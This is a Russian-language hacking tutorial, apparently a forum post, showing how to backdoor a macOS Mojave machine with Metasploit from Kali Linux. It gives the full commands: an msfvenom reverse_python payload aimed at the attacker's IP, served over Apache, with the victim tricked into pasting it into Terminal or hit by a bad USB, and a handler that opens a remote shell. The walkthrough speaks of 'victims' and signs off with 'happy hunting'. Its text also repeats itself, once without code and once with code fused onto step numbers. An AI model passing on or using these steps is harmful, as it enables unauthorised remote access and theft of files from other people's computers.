Привет. В последние время от всех друзей слышу, что Mac OS X - самая безопасная система. Но почему? Основной аргумент - у данной ОС закрытая файловая система, в то время как у Windows она открыта. Это значит, что можно просмотреть все системные файлы или отредактировать их. Злоумышленники используют ее для устойчивости вирусов, путем перемещения вируса в папку с системными файлами и дальнейшим его переименованием в файл обновления, например explorer.exe. Но сейчас я покажу как можно создать бэкдор в яблочной системе при помощи команды в терминале.
Для создания бэкдора понадобится всеми любимый Metasploit, установленный на Kali Linux. В качестве жертвы выступит macOS Mojave версии 10.14.4 на моем макбуке. А в качестве атакующей машины - Kali Linux на virtual box. Заражение компьютера будет происходить через комманд шелл, написанный на питоне. В результате удачной атаки откроется доступ к файловой системе жертвы, возможность загружать сторонние эксплоиты на компьютер или скачивать файлы с зараженной машины.
Перейдем к практике.
1) Запустим метасплоит всем известной командой
(примечание: если у кого то она не работает, запустите программу через графическое меню слева)
2)
3) Создаем сам exploit, указывая свой IPv4 вместо YOUR IP
4) Для удобства запустим сервер apache
5) Переместим туда shell.py
6) Настраиваем метасплоит под наш вирус и запускаем. Главное не сделать опечатку, а то все пойдет через АНБ.
7) Если у вас есть доступ к компьютеру жертвы, то откройте safari и перейдите по ссылке lhost, если же нет, то можно использовать bad usb
8) Открываем файл shell.py
9) Видим непонятные цифры и буквы в формате base64, копируем, вставляем в терминал и запускаем.
10)И видим что у появилась одна сессия.
(примечание: после запуска сессии никаких дополнительных команд вводить не нужно, вы уже внутри.)
11) Ну а что вы будете делать дальше зависит только от вашего воображения.
чтобы узнать в какой вы директории, напишите
чтобы узнать какие файлы в директории, напишите
Спасибо за внимание и удачной охоты.
Для создания бэкдора понадобится всеми любимый Metasploit, установленный на Kali Linux. В качестве жертвы выступит macOS Mojave версии 10.14.4 на моем макбуке. А в качестве атакующей машины - Kali Linux на virtual box. Заражение компьютера будет происходить через комманд шелл, написанный на питоне. В результате удачной атаки откроется доступ к файловой системе жертвы, возможность загружать сторонние эксплоиты на компьютер или скачивать файлы с зараженной машины.
Перейдем к практике.
1) Запустим метасплоит всем известной командой
Код:
msfconsole2)
use exploit/multi/handler
3) Создаем сам exploit, указывая свой IPv4 вместо YOUR IP
Код:
msfvenom -p cmd/unix/reverse_python LHOST=YOUR IP LPORT=9090 -f rar > /root/shell.py4) Для удобства запустим сервер apache
Код:
service apache2 start5) Переместим туда shell.py
Код:
cp shell.py /var/www/html6) Настраиваем метасплоит под наш вирус и запускаем. Главное не сделать опечатку, а то все пойдет через АНБ.
Код:
set payload cmd/unix/reverse_python
set LHOST YOUR IPv4
set LPORT 9090
run7) Если у вас есть доступ к компьютеру жертвы, то откройте safari и перейдите по ссылке lhost, если же нет, то можно использовать bad usb
8) Открываем файл shell.py
9) Видим непонятные цифры и буквы в формате base64, копируем, вставляем в терминал и запускаем.
10)И видим что у появилась одна сессия.
(примечание: после запуска сессии никаких дополнительных команд вводить не нужно, вы уже внутри.)
11) Ну а что вы будете делать дальше зависит только от вашего воображения.
чтобы узнать в какой вы директории, напишите
pwdчтобы узнать какие файлы в директории, напишите
ls
Спасибо за внимание и удачной охоты.
